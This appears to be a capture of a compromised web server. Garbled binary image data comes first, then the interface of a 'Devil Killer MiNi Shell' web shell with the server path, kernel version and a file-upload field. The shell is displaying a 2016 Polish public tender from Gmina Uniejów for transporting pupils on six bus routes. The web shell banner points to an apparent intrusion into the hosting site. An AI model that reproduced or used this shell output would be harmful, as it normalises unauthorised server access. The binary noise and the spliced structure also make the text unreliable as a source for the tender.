JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160530/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160530/59969-N-2016.html

<p class="kh_header"><b>Uniejów: Dowożenie uczniów do Przedszkola, Szkół Podstawowych i Gimnazjum znajdujących się na terenie Gminy Uniejów w roku szkolnym 2016/2017 od dnia 01 września 2016 do dnia 31 grudnia 2016 r.</b><br>
<b>Numer ogłoszenia: 59969 - 2016; data zamieszczenia: 30.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Uniejów , ul. Błogosławionego Bogumiła 13, 99-210 Uniejów, woj. łódzkie, tel. 063 2888192, faks 063 2888192.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uniejow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowożenie uczniów do Przedszkola, Szkół Podstawowych i Gimnazjum znajdujących się na terenie Gminy Uniejów w roku szkolnym 2016/2017 od dnia 01 września 2016 do dnia 31 grudnia 2016 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest świadczenie usług transportowych dla dzieci uczęszczających do przedszkola i szkół na terenie Gminy Uniejów na trasie z domu do  szkoły i z powrotem wraz z zapewnieniem opieki w czasie dowożenia we wszystkie dni realizacji zajęć szkolnych i przedszkolnych w roku szkolnym 2016/2017- od dnia 
01 września 2016 r.  do dnia 31 grudnia 2016 r.
2.  Dowożeniem objęte są dzieci, które realizują obowiązek szkolny w Zespole Szkół w Uniejowie (Szkoła Podstawowa im. Bohaterów Września 1939 r. oraz Gimnazjum im.
 Abp. J. B. Skotnickiego w Uniejowie, ul. Kościelnicka 26-28, 99-210 Uniejów); Szkoły Podstawowej im. Płk. Pil. Szczepana Ścibiora w Wieleninie, Wielenin 30 A, 99-210  Uniejów; Szkoły Podstawowej im. M. Skłodowskiej Curie w Wilamowie, Wilamów 50, 99-210 Uniejów; Szkoły Podstawowej w Spycimierzu, Spycimierz 7, 99-210 Uniejów oraz Miejskiego Przedszkola w Uniejowie, ul. Wiśniowa 9, 99-210 Uniejów.
3. Na zamówienie składa się obsługa sześciu tras:
Trasa I: - Długość dzienna trasy ( 3 kursy: 1 dowóz i 2 odwozy) -   85 km  
Razem dzieci dowożonych  62
Dąbrowa wsiada 8, Rożniatów i Rożniatów Kol. Wsiada 29, Czepów wsiada 11, Stanisławów wsiada 8, Szkoła Podstawowa w Wieleninie wysiada 40,  Brzeziny wsiada 6 , Zespól Szkół w Uniejowie i Przedszkole wysiada 22
Autobus na  miejsc siedzących 56

Trasa II: - Długość dzienna trasy( 3 kursy: 1 dowóz i 2 odwozy)   -   110 km
Razem dzieci dowożonych  120
Kuczki  wsiada 11, Góry wsiada 4, Skotniki wsiada 3, Szkoła Podstawowa w Wilamowie wysiada 16, Lekaszyn wsiada 31, Brzozówka wsiada 7, Osina wsiada 8, Szkoła Podstawowa w Wilamowie wysiada 39, Czepów wsiada 16, Szkoła Wilamów wysiada 16,
a wsiada 11, Skotniki wsiada 4,  Ostrowsko wsiada 25,  Zespół Szkół w Uniejowie 
i Przedszkole wysiada 49
Autobus na  miejsc siedzących 49

Trasa III: - Długość dzienna trasy ( 3 kursy: 1 dowóz i 2 odwozy)  -   104 km
Razem dzieci dowożonych  97
Bronówek wsiada 5, Bronów wsiada 2, Kobylniki wsiada 9, Szarów wsiada 3,  Józefów wsiada 9, Wola Przedmiejska wsiada 17, Zespól Szkół w Uniejowie wysiada 45,  
Biernacice wsiada 24, Felicjanów wsiada 16,  Czekaj wsiada 12,  Zespól Szkół w Uniejowie 
i Przedszkole wysiada 52
Autobus na  miejsc siedzących 52

Trasa IV : - Długość dzienna  trasy ( 3 kursy: 1 dowóz i 2 odwozy)          80 km
Razem dzieci dowożonych  67
Człopy wsiada 30,  Wieścice wsiada 2, Zespół Szkół i Przedszkole w Uniejowie wysiada 32, Zieleń leśniczówka i Staw wsiada 13,  Spycimierz Kolonia i Spycimierz wsiada 22,  Zespół Szkół w Uniejowie i Przedszkole wysiada 35
Autobus na miejsc siedzących 35

Trasa V: - Długość dzienna  trasy ( 3 kursy: 1 dowóz i 2 odwozy)  - 118 km 
Razem dzieci dowożonych  97
Sempółki wsiada 20,  Niewiesz wsiada  30,  Grocholice wsiada 3, Zespół Szkół i Przedszkole wysiada 53, Gibaszew wsiada 2, Niemysłów wsiada 1, Krępa wsiada 2, Lipnica I i II wsiada 20, p. Przeganiała wsiada, Balin wsiada 2, Ul. Sienkiewicza wsiada 17, Zespół Szkół i Przedszkole wysiada 44
Autobus na  miejsc siedzących 53

Trasa VI - Długość dzienna trasy ( 2 kursy: 1 dowóz i 2 odwozy)  -   45 km  + Ostrowsko ( 1 kurs) - odwóz w południe 3 km  Razem 48 km
Razem dzieci dowożonych  76
Brzeziny i Brzeziny Kolonia wsiada  6,   Orzeszków i Orzeszków Kol.wsiada 24, Szkoła Podstawowa w Wieleninie wysiada 23, Wielenin wsiada 17,  Pęgów wsiada 2, Kozanki  wsiada 10, Zaborów wsiada 6 , Szkoła Podstawowa w Wieleninie wysiada 22, a wsiada 11, Zespół Szkół w Uniejowie i Przedszkole wysiada 24
Autobus na  miejsc siedzących 42

4. Wykonywanie przewozów może odbywać się na utworzonych przez Wykonawcę liniach komunikacyjnych, w ramach przewozów regularnych lub regularnych specjalnych. 
5. Połączenia komunikacyjne na określonej drodze z domu do szkoły lub ze szkoły do domu muszą być zgodne z harmonogramem dowozów, o którym mowa w pkt. 17. 
6.  Liczba dzieci uprawnionych do korzystania z dowozów  519.
7.  Wykaz dowożonych dzieci (zawierający imię, nazwisko, adres zamieszkania oraz nr legitymacji - jeżeli została wydana) zostanie przekazany Wykonawcy do dnia  31.08.2016 r. 
8.   Zamawiający zastrzega sobie prawo do zmian na liście dowożonych uczniów, która jest wielkością szacunkową i związaną z tym zmianą adresów zamieszkania dzieci,  a także do wykazu dni nauki szkolnej. Różnica w ilości przewożonych dzieci (do 10 procent) nie będzie stanowić roszczeń Wykonawcy w stosunku do Zamawiającego, w szczególności nie powoduje zmiany wynagrodzenia przysługującego Wykonawcy za świadczone usługi wynikające z przedmiotowego zamówienia. O każdej zmianie  Zamawiający poinformuje Wykonawcę w formie pisemnej, poprzez faks lub e-mail. 
9.  Przez cały okres wykonywania zamówienia dowożenie dzieci winno być realizowane pojazdami spełniającymi wymagania techniczne określone przepisami prawa o ruchu  drogowym, zapewniającymi kierowcy możliwość jednoczesnego przewozu wszystkich dzieci na danej trasie oraz osoby zatrudnionej do sprawowania opieki nad dziećmi, posiadającymi sprawny system ogrzewania wnętrz w okresie zimowym oraz sprawną automatykę wszystkich drzwi. 
10. Na przedmiotową usługę składają się wszystkie czynności oraz związane z tym koszty niezbędne do właściwego i bezpiecznego przewozu dzieci rano z domu do szkoły i po południu ze szkoły do domu, a zwłaszcza zapewnienie bezpieczeństwa podczas sprawowanej opieki, odbioru dzieci od rodziców/opiekunów i przekazanie pod opiekę  szkoły, odbioru od nauczycieli ze szkoły i przekazanie pod opiekę rodziców oraz pomoc przy wsiadaniu i wysiadaniu z pojazdu. 
11. Dzieci powinny być dowiezione do szkoły w takim czasie, aby mogły rozpocząć zajęcia zgodnie z planem i były zabierane niezwłocznie po ich zakończeniu, bez zbędnego oczekiwania, zgodnie z opracowanym harmonogramem dowozów. 
12. Przewidywany czas rozpoczęcia zajęć lekcyjnych - godz. 8.00 i 8.20, powrót dzieci ze szkoły w godz. 12.45 - 16.30 (szczegółowe godziny będzie zawierał harmonogram dowozów). 
13. Ilość dni nauki szkolnej - z zastrzeżeniem pkt. 24 w roku szkolnym 2016/2017 od dnia 01.09.2016r. do 31.12.2016r. wynosi około - 79 (2016: IX-22, X-21, XI-20, XII-16).
14. Wykonawca musi dysponować minimum sześcioma pojazdami, posiadającymi taką ilość  miejsc siedzących wielkościowo dostosowanymi do ilości przewożonych uczniów, określonych w rozdziale V.1 pkt 3) lit. b.
15. Wykonawca musi dysponować osobami: minimum sześciu kierowców i minimum sześciu opiekunów. Wzrost liczby pojazdów realizujących zamówienie powoduje wzrost liczby kierowców i opiekunów. 
16. Każde dziecko musi mieć zapewnione miejsce siedzące. Nadzór nad przewożonymi dziećmi, szczególnie pod względem zapewnienia bezpieczeństwa i opieki należy do Wykonawcy. 
17. Realizacja przedmiotu zamówienia odbywa się na podstawie harmonogramu dowozów szkolnych. Harmonogram zawiera szczegółowy opis tras przejazdu, a w szczególności: godziny poszczególnych kursów, liczbę realizowanych km pomiędzy poszczególnymi miejscowościami oraz liczbę dowożonych dzieci z danej miejscowości. 
18. Harmonogram dowozów zostanie ustalony przez Zamawiającego w porozumieniu z Wykonawcą do dnia 20 września br. na podstawie projektu harmonogramu opracowanego przez dyrektora szkoły, po ustaleniu tygodniowego rozkładu zajęć szkolnych  i przedszkolnych.
19. Projekt harmonogramu po weryfikacji przez Zamawiającego zostanie przekazany Wykonawcy do dnia 31.08.2016 r. 
20. Harmonogram podlega bieżącej aktualizacji w przypadku stałej zmiany planu zajęć  szkolnych lub przedszkolnych, a tym samym zmiany liczby kilometrów, liczby  przewożonych dzieci na poszczególnych kursach oraz godzin poszczególnych kursów. Zamawiający akceptując ewentualne zmiany ma w szczególności na uwadze dobro
dowożonych dzieci oraz minimalizację kosztów dowozu. 
21. Przybliżona dzienna ilość kilometrów wynosi 545, w tym:
Trasa I- 85; Trasa II- 110; Trasa III- 104; Trasa IV- 80; Trasa V- 118; Trasa VI- 48.
Długość tras do przejechania w roku szkolnym 2016/17 w okresie  od 01.09 do 31.12.2016r., ustalona na dzień opracowania dokumentacji przetargowej wynosi około  43 055  km.
22. Rozmiar przedmiotu zamówienia w zakresie podanej liczby kilometrów określony jest głównie na podstawie roku szkolnego 2015/2016. Rzeczywista ilość kilometrów wynikać będzie z faktycznego zapotrzebowania Zamawiającego w roku szkolnym 2016/2017   i dlatego może ona ulec zmianie. Różnica w ilości kilometrów (do 5procent ilości szacunkowej  rocznej)  nie będzie stanowić roszczeń Wykonawcy w stosunku do Zamawiającego,  w szczególności nie  powoduje zmiany wynagrodzenia przysługującego Wykonawcy  za świadczone usługi wynikające z przedmiotowego zamówienia.     
23. Podana liczba km nie uwzględnia dojazdu do przystanków początkowych i odjazdu  z przystanków końcowych danej trasy, które zapewnia we własnym zakresie Wykonawca.  Ogólna liczba km liczona zatem jest od momentu zabrania pierwszych pasażerów do  momentu wysadzenia ostatnich. 
24. Zamawiający dopuszcza w sytuacjach wyjątkowych - niezależnych od przewoźnika odstępstwa od ustalonego harmonogramu dowozów szkolnych i wykonywanie usługi,  jako przewóz okazjonalny, w przypadku: 
 - odpracowywania zajęć szkolnych w innym dniu wolnym od zajęć, 
 - zmiany organizacji pracy szkoły spowodowaną obchodami uroczystości szkolnych, 
 - czasowej zmiany organizacji ruchu, 
 - niekorzystnych warunków atmosferycznych, 
 - innych wydarzeń, które mogą skrócić lub wydłużyć zajęcia lekcyjne, 
Wykonawca zobowiązany jest zapewnić przewóz dzieci zgodnie z rozkładem jazdy  ustalonym przez dyrektora szkoły i zaakceptowanym przez Zamawiającego. 
25. Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas wykonywania usług przewozu dzieci. Zamawiający nie bierze żadnej odpowiedzialności za wypadki  i zdarzenia jakiegokolwiek typu, w wyniku których nastąpi uszkodzenie ciała, śmierć czy szkoda materialna, spowodowana działaniem lub zaniechaniem działania Wykonawcy. Wykonawca zamówienia musi realizować je zgodnie z przepisami prawa, a w szczególności w zgodzie z ustawą z dnia 6 września 2001 r. o Transporcie drogowym  (Dz. U. z 2013 r., poz. 1414 ze zm.) oraz ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz. U. z 2012 r., poz. 1137 ze zm.). 
26. Kierowcy oraz osoby sprawujące opiekę nad dziećmi muszą posiadać odpowiednie kwalifikacje i ważne badania lekarskie oraz przeszkolenie w zakresie przepisów BHP i p.poż.
27. Ze względu na specyfikę świadczonej usługi (konieczność opieki nad dziećmi bezpośrednio w trakcie przewozu) osobą powołaną do sprawowania opieki nad dziećmi  nie może być kierowca pojazdu dokonujący przewozu dzieci na danej trasie. 
28. Wykonawca może na własny koszt przeprowadzić wizję lokalną miejsca realizacji zamówienia i jego otoczenia oraz uzyskać wszelkie informacje, jakie mogą być niezbędne w przygotowaniu oferty, a w szczególności wgląd do bieżącego  harmonogramu dowozów i odwozów w roku szkolnym 2015/2016 w Referacie Oświaty  na stanowisku gł. specjalisty do spraw oświaty, tel.(063) 2889783..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje zamówienia uzupełniające w wysokości nie przekraczającej 10% zamówienia podstawowego, o których mowa w art. 67 ust.1 pkt 6 i 7 lub art. 134 ust. 6 pkt 3 i 4 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst jednolity: Dz.U. z 2015 r. poz. 2164).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium przed upływem terminu składania ofert określonego w niniejszej SIWZ 
1. Wadium należy wnieść w wysokości 2.000,00 zł. 
2. Wadium może być wniesione w pieniądzu, w poręczeniach bankowych lub poręczeniach
    spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze
    poręczeniem pieniężnym oraz w gwarancjach bankowych, gwarancjach  
    ubezpieczeniowych lub poręczeniach udzielanych przez podmioty, o których mowa w art. 
    6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju 
    Przedsiębiorczości (t. j.: Dz. U. z 2016 r. Nr 359) 
3. Wadium wnoszone w pieniądzu należy wpłacić wyłącznie przelewem na rachunek
    bankowy Zamawiającego: 14 8557 0009 2005 0200 0130 0001 w takim terminie, aby 
    najpóźniej przed upływem terminu składania ofert - określonym w pkt XI SIWZ - środki
    finansowe z tytułu wadium znajdowały się na wskazanym wyżej rachunku Zamawiającego.
    Zamawiający stwierdzi wniesienie wadium na podstawie informacji banku prowadzącego 
    w/w rachunek. 
4. Wadium wniesione w innej formie niż pieniężna należy złożyć w oryginale w kasie Urzędu 
    Miasta w Uniejowie przed upływem terminu składania ofert w kopercie oznaczonej 
    w następujący sposób:  Wadium - przetarg na wykonanie usługi dla zadnia: 
    Dowożenie uczniów do Przedszkola, Szkół Podstawowych i Gimnazjum znajdujących się 
    na terenie Gminy Uniejów w roku szkolnym 2016/2017 od dnia 01 września 2016 do dnia 
   31 grudnia 2016 r  nie otwierać przed 09.06.2016 r., godz. 10.30. 
5. Gwarancja bankowa lub ubezpieczeniowa, stanowiąca formę wniesienia wadium, winna 
    spełniać co najmniej następujące wymogi (pod rygorem wykluczenia wykonawcy): 
    a) ustalać beneficjenta gwarancji, tj. Gminę Uniejów 
    b) określać kwotę gwarantowaną w zł (ustaloną w SIWZ) 
    c) określać termin ważności (wynikający z SIWZ) 
    d) być gwarancją nieodwoływalną, bezwarunkową, płatną na każde żądanie. 

Uwaga! 
Z treści gwarancji bankowej lub ubezpieczeniowej powinno wynikać uprawnienie Zamawiającego do zatrzymania wadium, jeżeli wystąpią przesłanki opisane w art. 46 ust. 4a 
i 5 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (tekst jedn. Dz.U. 
z 2015 r. poz. 2164), w szczególności uprawnienie Zamawiającego do zatrzymania wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 
6. Do wadium wniesionego w formie poręczenia wymagania opisane w pkt. 5 stosuje się  
    odpowiednio 
7. W przypadku nie wniesienia wadium na warunkach określonych w pkt. 1-4 Wykonawca 
    zostanie wykluczony z dalszego postępowania, a złożona przez niego oferta zostanie 
    odrzucona. 
8. Zwrot wadium nastąpi na zasadach określonych w art. 46 ustawy z dnia 29 listopada 2004
    r.- Prawo zamówień publicznych (t. j.: Dz. U. z 2015 r., poz. 2164). 

Oferent zobowiązany jest podać w ofercie dokładną informację odnośnie zwrotu wadium tj. adres banku, numer konta itp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę, że posiada aktualną licencję na wykonywanie  krajowego transportu drogowego osób, zgodnie  z ustawą z dnia 6 września 2001 r. o transporcie drogowym (tekst jednolity: Dz. U. z 2013r. poz.1414 z późn. zm.);</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - to w tym okresie, wykonywali minimum 2 usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia tj. dowożenie dzieci do przedszkoli lub szkół, wraz  
z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi te zostały wykonane, oraz załączenia dowodów, czy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował w celu wykonania zamówienia:
b)w zakresie potencjału technicznego:
minimum 6 pojazdami, posiadającymi taką ilość miejsc siedzących wielkościowo dostosowanymi do ilości przewożonych uczniów
dla trasy nr  I      56 miejsc siedzących                                 
dla trasy nr  II    49 miejsca siedzących
dla trasy nr  III   52 miejsc siedzących	
dla trasy nr  IV   35 miejsc siedzących	
dla trasy nr  V    53 miejsc siedzących
dla trasy nr  VI   42 miejsc siedzących
Każdy pojazd musi posiadać ubezpieczenie OC, NW oraz dokument potwierdzający stan techniczny - dopuszczenie pojazdu do ruchu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował w celu wykonania zamówienia:
a)w zakresie osób:
- minimum 6 osobami (kierowcami) posiadającymi odpowiednie kwalifikacje, prawo jazdy
  kategorii D, przeszkolenie w zakresie przepisów bhp i p.poż.,
- minimum 6 osobami do opieki nad dziećmi posiadającymi przeszkolenie w zakresie
  przepisów bhp i p.poż. 
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt VI.B.1÷VI.B.3  SIWZ.

Zgodnie z § 1 ust. 6 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r., poz. 231) Zamawiający żąda od Wykonawcy powołującego się przy wykazaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 2) i 3) ustawy Pzp, na zasoby innych podmiotów przedłożenia dokumentów / informacji dotyczących: 
a) Zakresu dostępnych wykonawcy zasobów innego podmiotu, 
b) Sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy
                wykonaniu zamówienia, 
c) Charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem 
d) Zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 

Ww. informacje powinny być zawarte w dokumencie potwierdzającym dysponowanie zasobami innych podmiotów (np. pisemnym zobowiązaniu innego podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonania oceny spełnienia warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
